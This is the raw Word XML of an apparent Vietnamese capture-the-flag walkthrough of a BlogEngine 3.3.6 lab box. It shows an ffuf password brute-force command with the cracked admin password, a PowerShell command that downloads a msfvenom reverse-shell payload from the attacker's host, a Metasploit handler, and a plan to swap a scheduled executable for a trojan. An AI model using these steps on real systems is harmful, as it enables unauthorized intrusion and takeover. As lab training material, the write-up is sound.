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A92503" w14:textId="3E2129ED" w:rsidR="002F49FE" w:rsidRDefault="00AD685A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DD6E344" wp14:editId="192B28FF">
            <wp:extent cx="5943600" cy="3745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24CD4" w14:textId="055A31CB" w:rsidR="009F3B64" w:rsidRDefault="009F3B64"/>
    <w:p w14:paraId="7034E4E0" w14:textId="3D247746" w:rsidR="009F3B64" w:rsidRDefault="008578A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đăng nhập:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B008083" w14:textId="1D4EF164" w:rsidR="008578A0" w:rsidRDefault="008578A0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="788F4DF6" w14:textId="2B2FD141" w:rsidR="008578A0" w:rsidRDefault="008578A0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8AF9ED" wp14:editId="4BB64988">
            <wp:extent cx="4525701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856"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4525701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B8533" w14:textId="464166F6" w:rsidR="008578A0" w:rsidRDefault="008578A0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5617CB59" w14:textId="7A93415C" w:rsidR="008578A0" w:rsidRDefault="00D552B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Thư viện </w:t>
      </w:r>
      <w:r w:rsidRPr="00D552B8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BlogEngine 3.3.6.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3F6F76" w14:textId="7000DB95" w:rsidR="00D552B8" w:rsidRDefault="00D552B8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF4C881" w14:textId="0611D2AD" w:rsidR="00AE06A9" w:rsidRDefault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dùng ffuf để bruteforce mật khẩu của admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CBE9F2" w14:textId="4DDAE478" w:rsidR="00AE06A9" w:rsidRDefault="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0138852F" w14:textId="77777777" w:rsidR="00AE06A9" w:rsidRPr="00AE06A9" w:rsidRDefault="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE06A9">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ffuf -w /Users/danghieu/SecLists/Passwords/Leaked-Databases/rockyou.txt  -X POST -d "__VIEWSTATE=DVLBuZYkfzkiK81NfctGfPx2%2FLV3Qdxyq95VnYS2WhZq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019345F3" w14:textId="09EF3B45" w:rsidR="00AE06A9" w:rsidRPr="00AE06A9" w:rsidRDefault="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE06A9">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QjoRk9f8xIr0PBjqoRUGcElTAA6ca2leRMc2%2B%2F4hu%2Fjn8kavAf1zQcPbwx42OAqiw%2FfpQzJJ8qlf1YJv38iRV0We3HzEzTw0mP%2BhiQEpFc2knaMDg9NeT9AZ7dNVzlYLWBPo&amp;__EVENTVALIDATION=jblmH2rka8MPSwITiz11a1%2FMyMM9vePVS0jen2Xb1%2Bxiy3zgIrmYHKX1uUq0qYHx2e6jGW6%2BBS2EwAoBh3Ve8bXn1%2FzFwzR1wjBkJTdG1pUpwYfmxmDHPum%2F4lrN8B6JX1TG1ust55m3MQ%2BYLgI%2FITOddV%2F9z0N018J7Zot9BxxaKqM2&amp;ctl00%24MainContent%24LoginUser%24UserName=admin&amp;ctl00%24MainContent%24LoginUser%24Password=FUZZ&amp;ctl00%24MainContent%24LoginUser%24LoginButton=Log+in" -H "Content-Type:appl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0073F3EE" w14:textId="77777777" w:rsidR="00AE06A9" w:rsidRPr="00AE06A9" w:rsidRDefault="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE06A9">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ication/x-www-form-urlencoded" -u "http://10.10.164.73/Account/login.aspx?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617BBDA9" w14:textId="6D714C4E" w:rsidR="00AE06A9" w:rsidRDefault="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE06A9">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ReturnURL=%2fadmin%2f" -replay-proxy http://127.0.0.1:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E893ADB" w14:textId="61A3BA66" w:rsidR="00AE06A9" w:rsidRDefault="00AE06A9" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6132C8E6" w14:textId="5245BDDD" w:rsidR="00AE06A9" w:rsidRDefault="00AE06A9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admin: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE06A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1qaz2wsx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5891A4CB" w14:textId="666BF3F5" w:rsidR="00AE06A9" w:rsidRDefault="00AE06A9" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567AF3A4" w14:textId="1513FFBF" w:rsidR="00AE06A9" w:rsidRDefault="008D1C9E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9A374CD" wp14:editId="7F199FCA">
            <wp:extent cx="4548852" cy="3714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67"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4563167" cy="372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470380" w14:textId="2EE32327" w:rsidR="008D1C9E" w:rsidRDefault="000C2AA7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Bạn </w:t>
      </w:r>
      <w:r w:rsidR="006A4E83">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">có thể thực thi lệnh từ xa </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">trong </w:t>
      </w:r>
      <w:r w:rsidRPr="000C2AA7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BlogEngine.NET 3.3.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA5350A" w14:textId="72F067AB" w:rsidR="000C2AA7" w:rsidRDefault="000C2AA7" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05654F42" w14:textId="103D93D5" w:rsidR="000C2AA7" w:rsidRDefault="00147C38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55D06AE" wp14:editId="3382D5E5">
            <wp:extent cx="4896090" cy="134266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677" cy="134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3C35" w14:textId="3D547AB9" w:rsidR="000C2AA7" w:rsidRDefault="000C2AA7" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF4DE73" w14:textId="0906DA6A" w:rsidR="00147C38" w:rsidRDefault="00147C38" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66F5D911" w14:textId="233399F0" w:rsidR="00147C38" w:rsidRDefault="00E11732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nâng cấp shell lên meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA54357" w14:textId="75D9892A" w:rsidR="00D111E5" w:rsidRDefault="00D111E5" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="356FF6C3" w14:textId="1353D5B2" w:rsidR="005826B6" w:rsidRDefault="005826B6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Tạo payload reverse shell bằng msfvenom:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E44FFD" w14:textId="1239D885" w:rsidR="00D111E5" w:rsidRDefault="005826B6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61822EA" wp14:editId="49BD14F3">
            <wp:extent cx="5943600" cy="10452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42B66" w14:textId="7C71D406" w:rsidR="005826B6" w:rsidRDefault="005826B6" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35DFE091" w14:textId="22793931" w:rsidR="005826B6" w:rsidRPr="00617C60" w:rsidRDefault="00617C60" w:rsidP="00AE06A9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Mở máy chủ web: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617C60">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python3 -m http.server 9000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F93CCF1" w14:textId="21DD0626" w:rsidR="00617C60" w:rsidRDefault="00617C60" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37419395" w14:textId="5D068411" w:rsidR="00617C60" w:rsidRDefault="00617C60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Tải </w:t>
      </w:r>
      <w:r w:rsidR="0027358F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> về máy nạn nhân:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E056913" w14:textId="11EE001D" w:rsidR="00DC5C88" w:rsidRDefault="00DC5C88" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BF9134A" w14:textId="728719A5" w:rsidR="00617C60" w:rsidRDefault="00617C60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7D5640C" wp14:editId="7B8B1622">
            <wp:extent cx="5943600" cy="22332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C939" w14:textId="61077A54" w:rsidR="00DC5C88" w:rsidRDefault="00DC5C88" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76ECD48F" w14:textId="25C29724" w:rsidR="00DC5C88" w:rsidRPr="00F6170B" w:rsidRDefault="00DC5C88" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6170B">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>powershell Invoke-WebRequest -uri http://10.8.55.148:9000/reverse-shell.exe -outfile C:\\Windows\tmp\reverse-shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F61E0A0" w14:textId="38F30150" w:rsidR="0027358F" w:rsidRDefault="0027358F" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D8633D3" w14:textId="574A6883" w:rsidR="0027358F" w:rsidRDefault="00710B85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Trước khi chạy chương trình, đảm bảo handler được thiết lập trong metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C985350" w14:textId="5AC10937" w:rsidR="00710B85" w:rsidRDefault="00710B85" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A8B6510" w14:textId="5B067488" w:rsidR="00710B85" w:rsidRDefault="003C6F6A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7550329" wp14:editId="5A005D41">
            <wp:extent cx="4456253" cy="4068711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0744" cy="407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7128" w14:textId="2F4EC6A7" w:rsidR="003C6F6A" w:rsidRDefault="003C6F6A" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C27B434" w14:textId="5966DF0A" w:rsidR="003C6F6A" w:rsidRPr="00D019E9" w:rsidRDefault="00D019E9" w:rsidP="00AE06A9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Lệnh để bắt đầu reverse shell trên máy nạn nhân: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D019E9">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reverse-shell.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A876670" w14:textId="1771AE6E" w:rsidR="00D019E9" w:rsidRDefault="00D019E9" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F3D8055" w14:textId="287D4E26" w:rsidR="00D019E9" w:rsidRDefault="00D019E9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ACBAB33" wp14:editId="3283881D">
            <wp:extent cx="5943600" cy="2599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BCDC9" w14:textId="2D828AE3" w:rsidR="004459E6" w:rsidRDefault="004459E6" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0416EB67" w14:textId="2E6E468E" w:rsidR="004459E6" w:rsidRDefault="00FE75D1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C11ACD" wp14:editId="6BA4DAE4">
            <wp:extent cx="4120587" cy="13136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772" cy="132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3BA9" w14:textId="19476583" w:rsidR="00617C60" w:rsidRDefault="00617C60" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E297D88" w14:textId="27A803CE" w:rsidR="002D6574" w:rsidRDefault="00C91BD8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Chạy script winpeasx64.exe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A6B9CB" w14:textId="77777777" w:rsidR="002D6574" w:rsidRDefault="002D6574" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3154EA0E" w14:textId="57D5298E" w:rsidR="002D6574" w:rsidRPr="002D6574" w:rsidRDefault="002D6574" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D6574">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cách khai thác thứ 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75990EEE" w14:textId="77777777" w:rsidR="002910D6" w:rsidRDefault="002910D6" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5ACCBB" w14:textId="7879474D" w:rsidR="00FA6835" w:rsidRDefault="002910D6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3F4A90D" wp14:editId="24D0C744">
            <wp:extent cx="4673600" cy="9525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15FBD" w14:textId="604E3A11" w:rsidR="00C91BD8" w:rsidRDefault="00C91BD8" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34169277" w14:textId="46B8A345" w:rsidR="00C91BD8" w:rsidRDefault="00C91BD8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27BF6C" wp14:editId="47602661">
            <wp:extent cx="5943600" cy="371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C79AA" w14:textId="5AB4424D" w:rsidR="002552A8" w:rsidRDefault="002552A8" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5060721E" w14:textId="774445D8" w:rsidR="002552A8" w:rsidRDefault="002552A8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186236" wp14:editId="5C631DA1">
            <wp:extent cx="3670300" cy="3683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030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79A4" w14:textId="3E9F39F5" w:rsidR="001D669E" w:rsidRDefault="001D669E" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D7F3A60" w14:textId="77777777" w:rsidR="001D669E" w:rsidRDefault="001D669E" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E7D1813" w14:textId="319418C0" w:rsidR="002552A8" w:rsidRDefault="00A8297B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865651" wp14:editId="579E961A">
            <wp:extent cx="5943600" cy="321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6404" w14:textId="5E329748" w:rsidR="002552A8" w:rsidRDefault="002552A8" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55E28CC8" w14:textId="75663B3B" w:rsidR="002D6574" w:rsidRPr="006B7396" w:rsidRDefault="002D6574" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B7396">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cách khai thác thứ 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFB3F37" w14:textId="5AB519B0" w:rsidR="002D6574" w:rsidRDefault="002D6574" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70A766C0" w14:textId="3BBA917E" w:rsidR="002D6574" w:rsidRDefault="0041191A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AFEE02" wp14:editId="252947F7">
            <wp:extent cx="5943600" cy="9105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628A" w14:textId="7C0D4B2E" w:rsidR="0041191A" w:rsidRDefault="0041191A" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="250A1814" w14:textId="2E937AD4" w:rsidR="0041191A" w:rsidRDefault="0041191A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Bạn có thể ghi dữ liệu và tạo file trong thư mục C:\PROGRA~2\SYSTEM~1\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADBECA8" w14:textId="1212DA7A" w:rsidR="0041191A" w:rsidRDefault="0041191A" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78542E18" w14:textId="41DAAF1C" w:rsidR="0041191A" w:rsidRDefault="0041191A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tạo </w:t>
      </w:r>
      <w:r w:rsidR="004F534C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1 reverse-shell bằng msfvenom, đổi tên là WService.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7C97E4" w14:textId="2FDBF40D" w:rsidR="004F534C" w:rsidRDefault="004F534C" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="242E51B1" w14:textId="0A1961A6" w:rsidR="004F534C" w:rsidRDefault="004F534C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Nhưng không khởi động lại dịch vụ được nên reverse shell thất bại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC3DE32" w14:textId="172FE32E" w:rsidR="003D4D77" w:rsidRDefault="003D4D77" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="232B2C56" w14:textId="708255A6" w:rsidR="003D4D77" w:rsidRDefault="003D4D77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Nhập lệnh ‘tasklist’ để liệt kê các dịch vụ đang chạy, chúng ta có:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531CC434" w14:textId="119FE552" w:rsidR="003D4D77" w:rsidRDefault="003D4D77" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E2D39E1" w14:textId="5D69A810" w:rsidR="003D4D77" w:rsidRDefault="003D4D77" w:rsidP="00AE06A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A74D25C" wp14:editId="32B824D4">
            <wp:extent cx="5943600" cy="17964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5FDB" w14:textId="69E3BB39" w:rsidR="003D4D77" w:rsidRDefault="003D4D77" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60925964" w14:textId="560A22D9" w:rsidR="003D4D77" w:rsidRDefault="003D4D77" w:rsidP="00AE06A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WSchedular.exe! Chúng ta có các dịch vụ được lên lịch để chạy trên máy ảo</w:t>
      </w:r>
      <w:r w:rsidRPr="003D4D77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chiếm quyền điều khiển dịch vụ nếu chúng ta có đặc quyền ghi trên thư mục đích.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE7BB84" w14:textId="1E11AB3F" w:rsidR="00097709" w:rsidRDefault="00097709" w:rsidP="00AE06A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E1D887B" w14:textId="7EABA412" w:rsidR="00DD77CC" w:rsidRDefault="00097709" w:rsidP="00097709">
      <w:pPr>
        <w:ind w:right="-138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Di chuyển đến thư mục ‘SystemSchedular’ trong ‘Program Files (x86)’ và liệt kê các tập tin, chúng ta có các tệp thực thi đáng chú ý như Message.exe, Privilege.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C24073" w14:textId="4C2F43A2" w:rsidR="00097709" w:rsidRDefault="00097709" w:rsidP="00097709">
      <w:pPr>
        <w:ind w:right="-138"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C427F1C" w14:textId="3B3E8D1E" w:rsidR="00097709" w:rsidRDefault="00A47390" w:rsidP="00097709">
      <w:pPr>
        <w:ind w:right="-138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F437FC7" wp14:editId="58D9EBF9">
            <wp:extent cx="4849792" cy="4272066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103" cy="427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93AF" w14:textId="69068DF8" w:rsidR="00A47390" w:rsidRDefault="00A47390" w:rsidP="00097709">
      <w:pPr>
        <w:ind w:right="-138"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B81446D" w14:textId="26A6E338" w:rsidR="00A47390" w:rsidRDefault="001A488E" w:rsidP="00097709">
      <w:pPr>
        <w:ind w:right="-138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Hãy kiểm tra xem cái gì đang được thực thi lặp đi lặp lại trên máy ảo không?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B67A210" w14:textId="01C142C1" w:rsidR="001A488E" w:rsidRDefault="001A488E" w:rsidP="00097709">
      <w:pPr>
        <w:ind w:right="-138"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E2A9671" w14:textId="41620370" w:rsidR="001A488E" w:rsidRDefault="008875A0" w:rsidP="00097709">
      <w:pPr>
        <w:ind w:right="-138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9078C1D" wp14:editId="75365B85">
            <wp:extent cx="5943600" cy="24149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EEB" w14:textId="466DD6D2" w:rsidR="008875A0" w:rsidRDefault="008875A0" w:rsidP="00097709">
      <w:pPr>
        <w:ind w:right="-138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Tuyệt vời! Message.exe được thực thi bởi quản trị viên mỗi 30 giây. Hãy tạo 1 tệp thực thi trojan có tên Message.exe và thay thế tệp gốc để chiếm quyền điều khiển dịch vụ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACC90D1" w14:textId="77777777" w:rsidR="009811EA" w:rsidRDefault="009811EA" w:rsidP="00C20665">
